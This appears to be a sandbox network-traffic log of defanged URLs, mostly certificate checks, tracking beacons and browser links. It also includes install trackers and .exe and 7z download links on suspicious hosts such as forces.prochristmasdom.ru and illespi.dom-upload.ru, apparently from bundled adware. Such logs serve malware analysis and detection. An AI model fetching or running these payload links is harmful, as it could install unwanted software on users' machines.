hxxp://top-fwz1.mail.ru/tracker?js=13;id=48844;u=http://go.mail.ru/?osd=1;st=1424684153747;title=ÐŸÐ¾Ð¸ÑÐº Mail.Ru;s=1716901;vp=1008756;touch=0;hds=1;flash=;sid=e74b9f5c;ver=60;nt=0/0/1424684151577/////1286/1286/1286/1286/1286//1289/1338/1396/1348/2189/2189/2483/3366/3366/;_=0.3633744779508561;e=RT/load;et=1424684154941
hxxp://common.radar.imgsmail.ru/update?rnd=994264022237&p=gomail2&t=gomail_main&v=1958
hxxp://common.radar.imgsmail.ru/update?rnd=1344337587941&p=gomail3&t=gomail_main&v=0&i=loadcomplete:1958
hxxp://fallback.global-ssl.fastly.net/static/r07/menu174.js
hxxp://fallback.global-ssl.fastly.net/static/r07/sh200.html
hxxp://go.mail.ru/static/web/img/main/ajax_loader_hor.gif
hxxp://go.imgsmail.ru/pxt?pxn=mpic&_=1424684155023&e=507f606c18792767&r=&w=26&h=l&a=none
hxxp://common.radar.imgsmail.ru/update?p=headline&t=loading_goMailRu&v=5038&i=domainLookup0:0,connect:0,request:49,response:58,domComplete:2018,domContentLoaded:841,load:2072&rnd=0.2006721708457917
hxxp://a1294.w20.akamai.net/b?c1=7&c2=2000001&c3=1&rn=1uaxbdb&c7=http://go.mail.ru/?osd=1&c8=ÐŸÐ¾Ð¸ÑÐº Mail.Ru&cv=1.7
hxxp://m.addthisedge.com/live/red_lojson/300lo.json?9ho1q4&colc=1424684155231&si=54eaf47a338ecd7f&uid=54eaf47bdb0e5f32&pub=ra-4f75c7297cc8ab7f&rev=18.0-edge&jsl=1&ln=en&pc=men&vpc=&dp=go.mail.ru&fp=?osd=1&aa=0&of=0&uf=1&nt=cs;3,ce;51,dc;185,dclee;184,dcles;184,di;184,dl;105,dle;3,dls;2,fs;0,lee;u,les;185,ns;0,rs;51,rspe;180,rsps;98,scs;u&pd=0&irt=0&ct=1&tct=0&abt=0&lt=256&cdn=0&lnlc=us&whcs=1&tl=c=620,m=842,i=873,xm=1098,xp=1113&pi=1&&rb=0&gen=1000&gen=100&callback=_ate.track.hsr&mk=ÐŸÐ¾Ð¸ÑÐº,Ð¿Ð¾Ð¸ÑÐºÐ¾Ð²Ð°Ñ ÑÐ¸ÑÑ‚ÐµÐ¼Ð°,Ð¿Ð¾Ð¸ÑÐºÐ¾Ð²Ð°Ñ Ð¼Ð°ÑˆÐ¸Ð½Ð°,Ð¿Ð¾Ð¸ÑÐºÐ¾Ð²Ð¸Ðº,Ð¿Ð¾Ð¸ÑÐº Ð¿Ð¾ ÐºÐ°Ñ€Ñ‚Ð¸Ð½ÐºÐ°Ð¼,Ð¿Ð¾Ð¸ÑÐº Ð² Ð¸Ð½Ñ‚ÐµÑ€Ð½ÐµÑ‚Ðµ,Ð±ÐµÑÐ¿Ð»Ð°Ñ‚Ð½Ñ‹Ð¹ Ð¿Ð¾Ð¸ÑÐº,Ð¿Ð¾Ð¸ÑÐº Ð¿Ð¾ Ð²Ð¸Ð´ÐµÐ¾,Ð¿Ð¾Ð¸ÑÐº c Ñ€ÐµÐºÐ¾Ð¼ÐµÐ½Ð´Ð°Ñ†Ð¸ÑÐ¼Ð¸,Ð¿Ð¾Ð¸ÑÐº Ð¿Ð¾ Ð½Ð¾Ð²Ð¾ÑÑ‚ÑÐ¼,Ð¿Ð¾Ð¸ÑÐº Ð»ÑŽÐ´ÐµÐ¹.&uvs=54eaf47adf09bb20000&chr=UTF-8&md=0&vcl=0
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEB46A3HdHEXOiQww+nhhjfk=
hxxp://youtube-ui.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCBB4deWARfX0
hxxp://hostedocsp.globalsign.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAS9O4UUM
hxxp://e8218.ce.akamaiedge.net/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6bw==
hxxp://e6845.ce.akamaiedge.net/ThawtePremiumServerCA.crl
hxxp://repository.certum.pl/ca.cer
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEHYQEooXtoK7Oh+dGpo1wJI=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSxiwsBl1MHLHQ30p2z4Y2jbM5X4AQU0m/3lvSFP3I8MH0j2oV4m6N8WnwCEByHJPaIvdcO654p2Z97OpQ=
hxxp://hostedocsp.globalsign.com/gsorganizationvalg2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBReGXQV/tqUV3SNMRE+s25eR/vhjwQUXUayjcRLdBy77fVztjq3OI91nn4CEhEhihvzIC1sAPI2iFVmRPGsPg==
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEE1fLDQIskwgzW1QfiRNyew=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT1uKgYjpCmJone3Avzs5JQQsaeCgQUq0TkXeyDx9nAhZ/34caXkLCMP5gCEBkhCfOEtGdvG7S9udrmGYs=
hxxp://ocsp.certum.pl/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR5iK7tYk9tqQEoeQhZNkKcAol9bgQUjEPEy22YwaechGnr30oNYJY6w/sCEEyl/sZhfEiwVjgqgoDgUIw=
hxxp://fesity.ru/replace
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEEfSKbCvSoRrx+JDeFk3zmo=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQxsL2eHTbKwjJcY2gHLbXTx2GdSQQUp6KDuzRFQD381TBPErk+oQGf9tsCEAIJNvbKBTT4mOdlfu7a8FY=
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEAdvEkaBRZwo1UjWl8QOABs=
hxxp://notypage.ru/ping?v=1.2.15&q=wfj8ij
hxxp://maps.yandex.ua/?from=dist_svz
hxxp://yandex.st/lego/_/qFyz_p77Mklm6G-g9tbfmp6arrk.ico
hxxp://ocsp.godaddy.com.akadns.net//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ==
hxxp://aukro.ua/?ap=1&aid=24290099&utm_source=operabrowser&utm_medium=advert&utm_campaign=speed_dial
hxxp://ocsp.godaddy.com.akadns.net//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc=
hxxp://ocsp.godaddy.com.akadns.net//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwgH+WTEf6I=
hxxp://c.allegrostatic.pl/images/velalayout/favicons/7868d43b.aukro-ua.ico
hxxp://www.c.booking.com/index.html?aid=343341&label=operasoft-sdO15-343341-&utm_source=Opera&utm_medium=web&utm_campaign=sdO15
hxxp://ocsp.godaddy.com.akadns.net//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CByd0HN5byag=
hxxp://cs367.wac.edgecastcdn.net/static/img/b25logo/favicon/ebc77706da3aae4aee7b05dadf182390f0d26d11.ico
hxxp://megogo.net/ru?utm_source=operadesktop&utm_medium=operaspeeddial&utm_campaign=operaspeeddial
hxxp://ocsp.usertrust.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQCJu4vX6KBCDTazDOA5oCs6Cf2BAQUmeRAX2sUXj4F2d3TY1T8Yrj3AKwCEQC0s+PTXrSCm7jlM0aIFWoS
hxxp://megogo.net/favicon.ico?1502091338
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI=
hxxp://e6845.ce.akamaiedge.net/pca3.crl
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/xkCfyHfJr7GQ6M658NRZ4SHo/AQUCPVR6Pv+PT1kNnxoz1t4qN+5xTcCEGC2x6sSmevembHfY1acIZk=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEGwkCSV07gf3g5QOsqmf+MY=
hxxp://forces.prochristmasdom.ru/touch_install?name=go_search_taskbar.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=72ff008b16006154dc070d945474c1849a84d99b5f42bcb48c4f60d1bf607a46&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://forces.prochristmasdom.ru/launch_install?name=go_search_taskbar.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=72ff008b16006154dc070d945474c1849a84d99b5f42bcb48c4f60d1bf607a46&md5=f559ddd5ecfeb426dc00c567b9dd0cee&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://gstinfo.ru/?prod=shortcutmaker&version=1.0.0.113&action=set_shortcut_start&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=2f30dcb5fee49f267a17c01eac0c5821&guid=140C363D39D3429482E45C1A8EB2CC99
hxxp://forces.vseturbo.ru/software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&guid=140c363d-39d3-4294-82e4-5c1a8eb2cc99&sig=b175ed15447c2776105be181a7b60852&ovr=0&file_id=32888998&did=1497824015&ext_partner_id=&go_search_taskbar=1&ext_partner_id=
hxxp://gstinfo.ru/?prod=shortcutmaker&version=1.0.0.113&action=set_shortcut_success&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=7c01ff2c1ae698a011886c728c9d1fe1&guid=140C363D39D3429482E45C1A8EB2CC99
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicCodSigPCA_08-31-2010.crl
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8=
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2+iPob4twryIF+FfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa/LgCEBBwnU/1VAjXMGAB2OqRdbs=
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEFtqk1INVLZiatsa9bb94KA=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEEDrVXFQCT2U83rWiGehg1Q=
hxxp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
hxxp://g.symcd.com/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6dg==
hxxp://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEFtqk1INVLZiatsa9bb94KA=
hxxp://mscrl.microsoft.com/pki/mscorp/crl/msitwww2.crl
hxxp://www.youtube.com/
hxxp://crl.verisign.com/pca3.crl
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCASLFcOoMN4Y
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?8fecbf530911d77c
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/xkCfyHfJr7GQ6M658NRZ4SHo/AQUCPVR6Pv+PT1kNnxoz1t4qN+5xTcCEGC2x6sSmevembHfY1acIZk=
hxxp://bs.mail.ru/count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04fa2A0Qe1fPKSEf6yq4ba1fE53K6kzkZQUDHmh-04iG6xw-iJiLPxqLHx1m00,bs.mail.ru,2579112161391436322,3896980131
hxxp://gb.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U=
hxxp://crl.thawte.com/ThawtePremiumServerCA.crl
hxxp://www.ebay.com/?rmvSB=true
hxxp://www.opera.com/follow?utm_medium=speed_dial_thumbnail&utm_source=speed_dial_computer&utm_campaign=social_follow_us_page
hxxp://headline.radar.imgsmail.ru/update?p=headline&t=loading_goMailRu&v=5038&i=domainLookup0:0,connect:0,request:49,response:58,domComplete:2018,domContentLoaded:841,load:2072&rnd=0.2006721708457917
hxxp://s7.addthis.com/static/r07/sh200.html
hxxp://ocsp.godaddy.com//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc=
hxxp://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEEDrVXFQCT2U83rWiGehg1Q=
hxxp://gomail.radar.imgsmail.ru/update?rnd=410912142275&p=gomail&t=gomail_main&v=782
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0=
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w=
hxxp://sputnikmailru.cdnmail.ru/mailruhomesearchvbm.exe?rfr=blackbear1
hxxp://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHHKyY9lBgWVXZrYbPK9VrY=
hxxp://www.bing.com/s/a/bing_p.ico
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?15377a6d967eaff9
hxxp://www.yahoo.com/?ilc=400
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j+ApJVk=
hxxp://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEH7hSm9v7/LTfz+tZU062rQ=
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8=
hxxp://xtnmailru.cdnmail.ru/go_chxtn4.7z
hxxp://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQCJu4vX6KBCDTazDOA5oCs6Cf2BAQUmeRAX2sUXj4F2d3TY1T8Yrj3AKwCEQC0s+PTXrSCm7jlM0aIFWoS
hxxp://www.opera.com/favicon.ico
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEE1fLDQIskwgzW1QfiRNyew=
hxxp://crl.microsoft.com/pki/crl/products/WinPCA.crl
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEGwkCSV07gf3g5QOsqmf+MY=
hxxp://www.ebay.com/favicon.ico
hxxp://subca.ocsp-certum.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR5iK7tYk9tqQEoeQhZNkKcAol9bgQUjEPEy22YwaechGnr30oNYJY6w/sCEEyl/sZhfEiwVjgqgoDgUIw=
hxxp://operasoftware.pc.cdn.bitgravity.com/pub/opera/desktop/27.0.1689.69/win/Opera_27.0.1689.69_Setup.exe
hxxp://gb.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEDe+2HQUBMnr81Cg/dygBNE=
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT1uKgYjpCmJone3Avzs5JQQsaeCgQUq0TkXeyDx9nAhZ/34caXkLCMP5gCEBkhCfOEtGdvG7S9udrmGYs=
hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
hxxp://xtnmailru.cdnmail.ru/go_chvbm6.7z
hxxp://net.geo.opera.com/opera/stable?utm_medium=pb&utm_source=turbo&utm_campaign=turbo_newNI
hxxp://rover.ebay.com/rover/1/711-53200-19255-0/1?icep_ff3=1&pub=5574672411&toolid=10001&campid=5337314645&customid=&ipn=psmain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg
hxxp://s7.addthis.com/js/300/addthis_widget.js
hxxp://s7.addthis.com/static/r07/core201.js
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEG7MeqWnAyAJuM689OlS1JE=
hxxp://ocsp.godaddy.com//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwgH+WTEf6I=
hxxp://finance.yahoo.com/webservice/v1/symbols/allcurrencies/quote?format=json&random=0.44692643848247826
hxxp://xtnmailru.cdnmail.ru/go_ffspt1.7z
hxxp://crl.geotrust.com/crls/secureca.crl
hxxp://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh/sBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAaeHbd/zx37qXr15cmiQDc=
hxxp://xtnmailru.cdnmail.ru/go_chhp11956636.7z
hxxp://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8=
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4=
hxxp://www.opera.com/download/get/?id=38020&autoupdate=1&ni=1&stream=stable&utm_source=turbo&utm_campaign=turbo_newNI&utm_medium=pb&niuid=dd1a4d0e-56b7-42dc-b0d5-e49130159c6f
hxxp://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEApfEU0DWxeRF9Lv1AOMPzs=
hxxp://gomail.radar.imgsmail.ru/update?rnd=339811679857&p=gomail0&t=gomail_main&v=0
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQMgSk4dLKWKRB+2DViUmQEUw3ggwQUDURcFlNEwYJ+HSCrJfQBY9i+eaUCEElf2B2zS0yDvnMYzCuOCTI=
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQxsL2eHTbKwjJcY2gHLbXTx2GdSQQUp6KDuzRFQD381TBPErk+oQGf9tsCEAIJNvbKBTT4mOdlfu7a8FY=
hxxp://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTtSK3dy3sA4g6EKqm0CfGsMDTPlgQUUOpzidsp+xCPnuUBINTeeZlIg/cCEAFxUrzHYO3GFd2OT1fIbA8=
hxxp://m.addthis.com/live/red_lojson/300lo.json?9ho1q4&colc=1424684155231&si=54eaf47a338ecd7f&uid=54eaf47bdb0e5f32&pub=ra-4f75c7297cc8ab7f&rev=18.0-edge&jsl=1&ln=en&pc=men&vpc=&dp=go.mail.ru&fp=?osd=1&aa=0&of=0&uf=1&nt=cs;3,ce;51,dc;185,dclee;184,dcles;184,di;184,dl;105,dle;3,dls;2,fs;0,lee;u,les;185,ns;0,rs;51,rspe;180,rsps;98,scs;u&pd=0&irt=0&ct=1&tct=0&abt=0&lt=256&cdn=0&lnlc=us&whcs=1&tl=c=620,m=842,i=873,xm=1098,xp=1113&pi=1&&rb=0&gen=1000&gen=100&callback=_ate.track.hsr&mk=ÐŸÐ¾Ð¸ÑÐº,Ð¿Ð¾Ð¸ÑÐºÐ¾Ð²Ð°Ñ ÑÐ¸ÑÑ‚ÐµÐ¼Ð°,Ð¿Ð¾Ð¸ÑÐºÐ¾Ð²Ð°Ñ Ð¼Ð°ÑˆÐ¸Ð½Ð°,Ð¿Ð¾Ð¸ÑÐºÐ¾Ð²Ð¸Ðº,Ð¿Ð¾Ð¸ÑÐº Ð¿Ð¾ ÐºÐ°Ñ€Ñ‚Ð¸Ð½ÐºÐ°Ð¼,Ð¿Ð¾Ð¸ÑÐº Ð² Ð¸Ð½Ñ‚ÐµÑ€Ð½ÐµÑ‚Ðµ,Ð±ÐµÑÐ¿Ð»Ð°Ñ‚Ð½Ñ‹Ð¹ Ð¿Ð¾Ð¸ÑÐº,Ð¿Ð¾Ð¸ÑÐº Ð¿Ð¾ Ð²Ð¸Ð´ÐµÐ¾,Ð¿Ð¾Ð¸ÑÐº c Ñ€ÐµÐºÐ¾Ð¼ÐµÐ½Ð´Ð°Ñ†Ð¸ÑÐ¼Ð¸,Ð¿Ð¾Ð¸ÑÐº Ð¿Ð¾ Ð½Ð¾Ð²Ð¾ÑÑ‚ÑÐ¼,Ð¿Ð¾Ð¸ÑÐº Ð»ÑŽÐ´ÐµÐ¹.&uvs=54eaf47adf09bb20000&chr=UTF-8&md=0&vcl=0
hxxp://gb.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEB46A3HdHEXOiQww+nhhjfk=
hxxp://gb.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEEfSKbCvSoRrx+JDeFk3zmo=
hxxp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
hxxp://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTPJvUY+sl+j4yzQuAcL2oQno5fCgQUUWj/kK8CB3U8zNllZGKiErhZcjsCEArKdNViqZvRTsj6pSQqLDU=
hxxp://gomail.radar.imgsmail.ru/update?rnd=1344337587941&p=gomail3&t=gomail_main&v=0&i=loadcomplete:1958
hxxp://ocsp2.globalsign.com/gsorganizationvalg2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBReGXQV/tqUV3SNMRE+s25eR/vhjwQUXUayjcRLdBy77fVztjq3OI91nn4CEhEhihvzIC1sAPI2iFVmRPGsPg==
hxxp://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAHevvgBk+xJc0C0AAQAAd68=
hxxp://dc.cc.bf.a1.top.mail.ru/counter?id=631797;;r=;j=true;s=1716*901;d=24;rand=0.2730049511883408
hxxp://ocsp.geotrust.com/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6Yw==
hxxp://get.geo.opera.com.global.prod.fastly.net/res/servicefiles/sitepreference/siteprefs-desktop-1424440377.json
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEHYQEooXtoK7Oh+dGpo1wJI=
hxxp://gb.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o=
hxxp://g2.symcb.com/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6bw==
hxxp://illespi.dom-upload.ru/go_search_taskbar.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75
hxxp://ocsp.globalsign.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAS9O4UUM
hxxp://ocsp.omniroot.com/baltimoreroot/MEUwQzBBMD8wPTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom/nYB45SPUEwQU5Z1ZMIJHWMys+ghUNoZ7OrUETfACBAcnqkc=
hxxp://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ==
hxxp://r-ec.bstatic.com/static/img/b25logo/favicon/ebc77706da3aae4aee7b05dadf182390f0d26d11.ico
hxxp://bs.mail.ru/count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04agcEPWEcG8e1gW6bbHmwaRpGIMG6auKDGQxswDfur72lu0In0RlhwnEnLdlHL7W8
hxxp://gomail.radar.imgsmail.ru/update?rnd=994264022237&p=gomail2&t=gomail_main&v=1958
hxxp://www.certplus.com/CRL/class2.crl
hxxp://ocsp.godaddy.com//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CByd0HN5byag=
hxxp://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQgppSLAb7oJaQ6RVV2Zh9VwZIGMwQUkHHbN+tzyO/c1R4StjS6K1qgppICEAt9kXTqajTaLH9Ahr8T1UU=
